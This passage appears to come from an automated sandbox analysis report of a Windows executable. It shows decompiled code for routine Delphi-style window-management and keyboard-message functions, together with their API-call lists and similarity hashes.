                                                                                											_t141 = E0044F74C(_v8);
                                                                                											__eflags = _t141;
                                                                                											if(_t141 != 0) {
                                                                                												_t255 = E0043BD14(E0044F74C(_v8));
                                                                                											}
                                                                                										}
                                                                                										__eflags = _t255;
                                                                                										if(_t255 == 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											_t96 = SetFocus(_t255);
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L44;
                                                                                						} else {
                                                                                							_t145 = _t96 - 0x22;
                                                                                							if(_t145 == 0) {
                                                                                								_v24 =  *((intOrPtr*)(__edx + 8));
                                                                                								__eflags =  *_v24 - 1;
                                                                                								if( *_v24 != 1) {
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t148 = _v8;
                                                                                									__eflags =  *(_t148 + 0x248);
                                                                                									if( *(_t148 + 0x248) == 0) {
                                                                                										goto L43;
                                                                                									} else {
                                                                                										_t249 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                                                                										__eflags = _t249;
                                                                                										if(_t249 == 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											_v16 = E0041F488(0, 1);
                                                                                											_push(_t258);
                                                                                											_push(0x44f162);
                                                                                											_push( *[fs:eax]);
                                                                                											 *[fs:eax] = _t261;
                                                                                											_v12 = SaveDC( *(_v24 + 0x18));
                                                                                											_push(_t258);
                                                                                											_push(0x44f145);
                                                                                											_push( *[fs:eax]);
                                                                                											 *[fs:eax] = _t261;
                                                                                											E0041FE44(_v16,  *(_v24 + 0x18));
                                                                                											E0041FCC0(_v16);
                                                                                											E00449BE0(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                                                                											_pop(_t238);
                                                                                											 *[fs:eax] = _t238;
                                                                                											_push(0x44f14c);
                                                                                											__eflags = 0;
                                                                                											E0041FE44(_v16, 0);
                                                                                											return RestoreDC( *(_v24 + 0x18), _v12);
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								if(_t145 == 1) {
                                                                                									_t256 =  *((intOrPtr*)(__edx + 8));
                                                                                									__eflags =  *_t256 - 1;
                                                                                									if( *_t256 != 1) {
                                                                                										goto L43;
                                                                                									} else {
                                                                                										_t179 = _v8;
                                                                                										__eflags =  *(_t179 + 0x248);
                                                                                										if( *(_t179 + 0x248) == 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											_t250 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
                                                                                											__eflags = _t250;
                                                                                											if(_t250 == 0) {
                                                                                												goto L43;
                                                                                											} else {
                                                                                												_t184 = E0043BD14(_v8);
                                                                                												L00406F20();
                                                                                												_v20 = _t184;
                                                                                												 *[fs:eax] = _t261;
                                                                                												_v16 = E0041F488(0, 1);
                                                                                												 *[fs:eax] = _t261;
                                                                                												_v12 = SaveDC(_v20);
                                                                                												 *[fs:eax] = _t261;
                                                                                												E0041FE44(_v16, _v20);
                                                                                												E0041FCC0(_v16);
                                                                                												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x44f24c, _t258,  *[fs:eax], 0x44f269, _t258,  *[fs:eax], 0x44f290, _t258, _t184);
                                                                                												_pop(_t245);
                                                                                												 *[fs:eax] = _t245;
                                                                                												_push(0x44f253);
                                                                                												__eflags = 0;
                                                                                												E0041FE44(_v16, 0);
                                                                                												return RestoreDC(_v20, _v12);
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									L41:
                                                                                									_t267 =  *_t207 -  *0x487c08; // 0xc075
                                                                                									if(_t267 == 0) {
                                                                                										E00436848(_v8, 0, 0xb025, 0);
                                                                                										E00436848(_v8, 0, 0xb024, 0);
                                                                                										E00436848(_v8, 0, 0xb035, 0);
                                                                                										E00436848(_v8, 0, 0xb009, 0);
                                                                                										E00436848(_v8, 0, 0xb008, 0);
                                                                                										E00436848(_v8, 0, 0xb03d, 0);
                                                                                									}
                                                                                									L43:
                                                                                									_t96 = E004397C4(_v8, _t207);
                                                                                									L44:
                                                                                									return _t96;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x0044f041
                                                                                0x0044f03d
                                                                                0x00000000
                                                                                0x0044ef07
                                                                                0x0044ef0a
                                                                                0x0044ef0d
                                                                                0x0044ef37
                                                                                0x0044ef3e
                                                                                0x0044ef44
                                                                                0x0044ef47
                                                                                0x00000000
                                                                                0x0044ef4d
                                                                                0x0044ef4d
                                                                                0x0044ef50
                                                                                0x0044ef54
                                                                                0x00000000
                                                                                0x0044ef5a
                                                                                0x0044ef5a
                                                                                0x0044ef5c
                                                                                0x0044ef5f
                                                                                0x0044ef66
                                                                                0x0044ef88
                                                                                0x0044ef8e
                                                                                0x0044ef90
                                                                                0x0044ef92
                                                                                0x0044ef95
                                                                                0x0044ef9c
                                                                                0x0044ef9c
                                                                                0x0044ef95
                                                                                0x0044ef68
                                                                                0x0044ef6b
                                                                                0x0044ef70
                                                                                0x0044ef72
                                                                                0x0044ef81
                                                                                0x0044ef81
                                                                                0x0044ef72
                                                                                0x0044ef9e
                                                                                0x0044efa0
                                                                                0x00000000
                                                                                0x0044efa6
                                                                                0x0044efa7
                                                                                0x0044efa7
                                                                                0x0044efa0
                                                                                0x0044ef54
                                                                                0x0044ef47
                                                                                0x00000000
                                                                                0x0044ef0f
                                                                                0x0044ef0f
                                                                                0x0044ef12
                                                                                0x0044f06b
                                                                                0x0044f071
                                                                                0x0044f074
                                                                                0x00000000
                                                                                0x0044f07a
                                                                                0x0044f07a
                                                                                0x0044f07d
                                                                                0x0044f084
                                                                                0x00000000
                                                                                0x0044f08a
                                                                                0x0044f0a0
                                                                                0x0044f0a2
                                                                                0x0044f0a4
                                                                                0x00000000
                                                                                0x0044f0aa
                                                                                0x0044f0b6
                                                                                0x0044f0bb
                                                                                0x0044f0bc
                                                                                0x0044f0c1
                                                                                0x0044f0c4
                                                                                0x0044f0d3
                                                                                0x0044f0d8
                                                                                0x0044f0d9
                                                                                0x0044f0de
                                                                                0x0044f0e1
                                                                                0x0044f0ed
                                                                                0x0044f100
                                                                                0x0044f118
                                                                                0x0044f11f
                                                                                0x0044f122
                                                                                0x0044f125
                                                                                0x0044f12a
                                                                                0x0044f12f
                                                                                0x0044f144
                                                                                0x0044f144
                                                                                0x0044f0a4
                                                                                0x0044f084
                                                                                0x0044ef18
                                                                                0x0044ef19
                                                                                0x0044f169
                                                                                0x0044f16c
                                                                                0x0044f16f
                                                                                0x00000000
                                                                                0x0044f175
                                                                                0x0044f175
                                                                                0x0044f178
                                                                                0x0044f17f
                                                                                0x00000000
                                                                                0x0044f185
                                                                                0x0044f198
                                                                                0x0044f19a
                                                                                0x0044f19c
                                                                                0x00000000
                                                                                0x0044f1a2
                                                                                0x0044f1a5
                                                                                0x0044f1ab
                                                                                0x0044f1b0
                                                                                0x0044f1be
                                                                                0x0044f1cd
                                                                                0x0044f1db
                                                                                0x0044f1e7
                                                                                0x0044f1f5
                                                                                0x0044f1fe
                                                                                0x0044f211
                                                                                0x0044f224
                                                                                0x0044f229
                                                                                0x0044f22c
                                                                                0x0044f22f
                                                                                0x0044f234
                                                                                0x0044f239
                                                                                0x0044f24b
                                                                                0x0044f24b
                                                                                0x0044f19c
                                                                                0x0044f17f
                                                                                0x0044ef1f
                                                                                0x0044f297
                                                                                0x0044f299
                                                                                0x0044f29f
                                                                                0x0044f2ad
                                                                                0x0044f2be
                                                                                0x0044f2cf
                                                                                0x0044f2e0
                                                                                0x0044f2f1
                                                                                0x0044f302
                                                                                0x0044f302
                                                                                0x0044f307
                                                                                0x0044f30c
                                                                                0x0044f311
                                                                                0x0044f317
                                                                                0x0044f317
                                                                                0x0044ef19
                                                                                0x0044ef12
                                                                                0x0044ef0d
                                                                                0x0044ef01

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: RestoreSave$B080Focus
                                                                                • String ID:
                                                                                • API String ID: 809140284-0
                                                                                • Opcode ID: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction ID: 1e439a01ec3daa42eb792b9dfe2fd44ac08b08da1caa0c646f1805c946d7d8a3
                                                                                • Opcode Fuzzy Hash: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction Fuzzy Hash: BDB16F34A00104EFEB11DF69C586AAEB7F5EB09304F6544BAE804D7761CB38EE45CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00455044(void* __eax) {
                                                                                				struct HWND__* _t21;
                                                                                				intOrPtr* _t26;
                                                                                				signed int _t29;
                                                                                				intOrPtr* _t30;
                                                                                				int _t33;
                                                                                				intOrPtr _t36;
                                                                                				void* _t51;
                                                                                				int _t60;
                                                                                
                                                                                				_t51 = __eax;
                                                                                				_t21 = IsIconic( *(__eax + 0x30));
                                                                                				if(_t21 != 0) {
                                                                                					SetActiveWindow( *(_t51 + 0x30));
                                                                                					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                                                						L6:
                                                                                						E0045403C( *(_t51 + 0x30), 9, __eflags);
                                                                                					} else {
                                                                                						_t60 = IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t51 + 0x44))));
                                                                                						if(_t60 == 0) {
                                                                                							goto L6;
                                                                                						} else {
                                                                                							_push(0);
                                                                                							_push(0xf120);
                                                                                							_push(0x112);
                                                                                							_push( *(_t51 + 0x30));
                                                                                							L00406CF8();
                                                                                						}
                                                                                					}
                                                                                					_t26 =  *0x486b30; // 0x487a94
                                                                                					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                                                					if(_t60 < 0) {
                                                                                						asm("adc eax, 0x0");
                                                                                					}
                                                                                					_t30 =  *0x486b30; // 0x487a94
                                                                                					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                                                					if(_t60 < 0) {
                                                                                						asm("adc eax, 0x0");
                                                                                					}
                                                                                					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                                                					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                                                					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                                                						E0044FDF4(_t36, 0);
                                                                                						E004521CC( *((intOrPtr*)(_t51 + 0x44)));
                                                                                					}
                                                                                					E004546B8(_t51);
                                                                                					_t21 =  *0x487c00; // 0x2290f1c
                                                                                					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                                                					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                                                						_t21 = SetFocus(E0043BD14(_t55));
                                                                                					}
                                                                                					if( *((short*)(_t51 + 0x10a)) != 0) {
                                                                                						return  *((intOrPtr*)(_t51 + 0x108))();
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}












                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0045504C
                                                                                • SetActiveWindow.USER32(?,?,?,?,00454A8E,00000000,00454F30), ref: 0045505D
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00455080
                                                                                • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00454A8E,00000000,00454F30), ref: 00455099
                                                                                • SetWindowPos.USER32(?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 004550DF
                                                                                • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 00455124
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 3996302123-0
                                                                                • Opcode ID: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction ID: 44efac11194c49bad489fcaca8109da60455352909604ac3486cada3038b8842
                                                                                • Opcode Fuzzy Hash: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction Fuzzy Hash: 01313070B006009BEB20AB69CD95B6A3798AF44709F58146AFE00DF3D7D67CEC888759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0043B740(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                                                				void* _v20;
                                                                                				struct _WINDOWPLACEMENT _v48;
                                                                                				char _v64;
                                                                                				void* _t31;
                                                                                				int _t45;
                                                                                				int _t51;
                                                                                				void* _t52;
                                                                                				int _t56;
                                                                                				int _t58;
                                                                                
                                                                                				_t56 = __ecx;
                                                                                				_t58 = __edx;
                                                                                				_t52 = __eax;
                                                                                				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                                                					L4:
                                                                                					if(E0043C018(_t52) == 0) {
                                                                                						L7:
                                                                                						 *(_t52 + 0x40) = _t58;
                                                                                						 *(_t52 + 0x44) = _t56;
                                                                                						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                                                						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                                                						_t31 = E0043C018(_t52);
                                                                                						__eflags = _t31;
                                                                                						if(_t31 != 0) {
                                                                                							_v48.length = 0x2c;
                                                                                							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                							E00435040(_t52,  &_v64);
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                						}
                                                                                						L9:
                                                                                						E00434CF4(_t52);
                                                                                						return E004037B0(_t52, _t66);
                                                                                					}
                                                                                					_t45 = IsIconic( *(_t52 + 0x180));
                                                                                					_t66 = _t45;
                                                                                					if(_t45 != 0) {
                                                                                						goto L7;
                                                                                					}
                                                                                					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                                                					goto L9;
                                                                                				} else {
                                                                                					_t51 = _a4;
                                                                                					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                                                						return _t51;
                                                                                					}
                                                                                					goto L4;
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0043B77F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043B79D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 0043B7D3
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043B7F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction ID: f697fd54e0fb4167afa721afb97f5442208712750027ed9413839f016224fae9
                                                                                • Opcode Fuzzy Hash: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction Fuzzy Hash: 51210375A00204ABCF54EE6DC8C1ADA77A8EF4C354F04546AFE14EF346D779E9048BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00454F94(void* __eax) {
                                                                                				int _t21;
                                                                                				struct HWND__* _t36;
                                                                                				void* _t40;
                                                                                
                                                                                				_t40 = __eax;
                                                                                				_t1 = _t40 + 0x30; // 0x0
                                                                                				_t21 = IsIconic( *_t1);
                                                                                				if(_t21 == 0) {
                                                                                					E004546A8();
                                                                                					_t2 = _t40 + 0x30; // 0x0
                                                                                					SetActiveWindow( *_t2);
                                                                                					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                                                						_t15 = _t40 + 0x30; // 0x0
                                                                                						_t21 = E0045403C( *_t15, 6, __eflags);
                                                                                					} else {
                                                                                						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                                                						_t36 = E0043BD14( *((intOrPtr*)(_t40 + 0x44)));
                                                                                						_t13 = _t40 + 0x30; // 0x0
                                                                                						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                                                						_push(0);
                                                                                						_push(0xf020);
                                                                                						_push(0x112);
                                                                                						_t14 = _t40 + 0x30; // 0x0
                                                                                						_t21 =  *_t14;
                                                                                						_push(_t21);
                                                                                						L00406CF8();
                                                                                					}
                                                                                					if( *((short*)(_t40 + 0x102)) != 0) {
                                                                                						return  *((intOrPtr*)(_t40 + 0x100))();
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}







                                                                                APIs
                                                                                • IsIconic.USER32 ref: 00454F9C
                                                                                • SetActiveWindow.USER32(00000000,00000000,?,?,0045562C), ref: 00454FB4
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00454FD7
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045562C), ref: 00455000
                                                                                • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455015
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 1720852555-0
                                                                                • Opcode ID: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction ID: bc32191d19c11dd8aa89d07b34db473d5acae12cf2d68384427f1f3fe8b85b2d
                                                                                • Opcode Fuzzy Hash: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction Fuzzy Hash: AC113D716006009BDB50EE69C9C6B6A37ACAF08709F08106ABE00DF2C7D67DEC848768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00426384(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                                                				struct _WINDOWPLACEMENT _v48;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t19;
                                                                                				intOrPtr _t21;
                                                                                				struct HWND__* _t23;
                                                                                
                                                                                				_t19 = _a8;
                                                                                				_t23 = _a4;
                                                                                				if( *0x487abd != 0) {
                                                                                					if((_t19 & 0x00000003) == 0) {
                                                                                						if(IsIconic(_t23) == 0) {
                                                                                							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                                                						} else {
                                                                                							GetWindowPlacement(_t23,  &_v48);
                                                                                						}
                                                                                						return E004262F4( &(_v48.rcNormalPosition), _t19);
                                                                                					}
                                                                                					return 0x12340042;
                                                                                				}
                                                                                				_t21 =  *0x487a98; // 0x426384
                                                                                				 *0x487a98 = E00426184(1, _t19, _t21, __edi, _t23);
                                                                                				return  *0x487a98(_t23, _t19);
                                                                                			}











                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: MonitorFromWindow
                                                                                • API String ID: 190572456-2842599566
                                                                                • Opcode ID: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction ID: 567358acfe5b995f89d1c8aef49e0bb1b6a21afc04d96dbc621d34004d80f09b
                                                                                • Opcode Fuzzy Hash: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction Fuzzy Hash: 6B018F71604129AACB01EB94AC81AAF735CEB01318B95042BFC2593242DB3DDA1187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E00458744(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v268;
                                                                                				char _v508;
                                                                                				char _v524;
                                                                                				char _v528;
                                                                                				char _v532;
                                                                                				char _v536;
                                                                                				char _v540;
                                                                                				char _v544;
                                                                                				void* _t75;
                                                                                				intOrPtr _t91;
                                                                                				char* _t97;
                                                                                				signed int _t107;
                                                                                				signed int _t114;
                                                                                				intOrPtr _t121;
                                                                                				intOrPtr _t133;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t146;
                                                                                				int _t152;
                                                                                				intOrPtr _t153;
                                                                                				void* _t163;
                                                                                				void* _t164;
                                                                                				intOrPtr _t165;
                                                                                
                                                                                				_t163 = _t164;
                                                                                				_t165 = _t164 + 0xfffffde4;
                                                                                				_v544 = 0;
                                                                                				_v540 = 0;
                                                                                				_v536 = 0;
                                                                                				_v532 = 0;
                                                                                				_v528 = 0;
                                                                                				_t133 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_push(_t163);
                                                                                				_push(0x4589a4);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t165;
                                                                                				if(__edx >= 1) {
                                                                                					E0045820C(_v8,  &_v528);
                                                                                					if(E0040A92C(_v528, _t133) == 1) {
                                                                                						_t133 = _t133 - 1;
                                                                                					}
                                                                                				}
                                                                                				_v12 = _t133;
                                                                                				if(E00458524(_v8) == 0) {
                                                                                					__eflags = _v12;
                                                                                					if(_v12 < 0) {
                                                                                						__eflags = 0;
                                                                                						_v12 = 0;
                                                                                					}
                                                                                					E0045820C(_v8,  &_v540);
                                                                                					_t75 = E004045D8(_v540);
                                                                                					__eflags = _t75 - _v12;
                                                                                					if(_t75 <= _v12) {
                                                                                						E0045820C(_v8,  &_v544);
                                                                                						_v12 = E004045D8(_v544);
                                                                                					}
                                                                                					E00458720(_v8, _v12, _v12);
                                                                                					goto L21;
                                                                                				} else {
                                                                                					if(_v12 < 0) {
                                                                                						_v12 = 0;
                                                                                					}
                                                                                					_t135 = _v12 + 1;
                                                                                					E0045820C(_v8,  &_v532);
                                                                                					if(_t135 < E004045D8(_v532)) {
                                                                                						E0045820C(_v8,  &_v536);
                                                                                						asm("bt [edx], eax");
                                                                                						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
                                                                                							_t135 = _t135 + 1;
                                                                                						}
                                                                                					}
                                                                                					_t24 = _v8 + 0x228; // 0xda6855c0
                                                                                					_t91 =  *_t24;
                                                                                					if(_t91 <= _v12) {
                                                                                						_v12 = _t91;
                                                                                						_t135 = _v12;
                                                                                					}
                                                                                					E00458720(_v8, _t135, _t135);
                                                                                					if(_t135 == _v12) {
                                                                                						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
                                                                                						L21:
                                                                                						__eflags = 0;
                                                                                						_pop(_t146);
                                                                                						 *[fs:eax] = _t146;
                                                                                						_push(0x4589ab);
                                                                                						return E00404344( &_v544, 5);
                                                                                					} else {
                                                                                						GetKeyboardState( &_v268);
                                                                                						_t152 = 0x100;
                                                                                						_t97 =  &_v524;
                                                                                						do {
                                                                                							 *_t97 = 0;
                                                                                							_t97 = _t97 + 1;
                                                                                							_t152 = _t152 - 1;
                                                                                							_t177 = _t152;
                                                                                						} while (_t152 != 0);
                                                                                						_v508 = 0x81;
                                                                                						 *((char*)(_t163 + ( *(0x46bc44 + (E004037B0(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
                                                                                						SetKeyboardState( &_v524);
                                                                                						 *((char*)(_v8 + 0x23c)) = 1;
                                                                                						_push(_t163);
                                                                                						_push(0x458912);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t165;
                                                                                						_t107 = E004037B0(_v8, _t177);
                                                                                						SendMessageA(E0043BD14(_v8), 0x100,  *(0x46bc44 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                                						_t114 = E004037B0(_v8, _t177);
                                                                                						SendMessageA(E0043BD14(_v8), 0x101,  *(0x46bc44 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                                						_pop(_t153);
                                                                                						 *[fs:eax] = _t153;
                                                                                						_push(0x458919);
                                                                                						_t121 = _v8;
                                                                                						 *((char*)(_t121 + 0x23c)) = 0;
                                                                                						return _t121;
                                                                                					}
                                                                                				}
                                                                                			}




























                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,004589A4), ref: 0045883F
                                                                                • SetKeyboardState.USER32(00000081), ref: 00458883
                                                                                • SendMessageA.USER32(00000000,00000100,00000000,00000001), ref: 004588C8
                                                                                • SendMessageA.USER32(00000000,00000101,00000000,00000001), ref: 004588F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: KeyboardMessageSendState
                                                                                • String ID:
                                                                                • API String ID: 1999190242-0
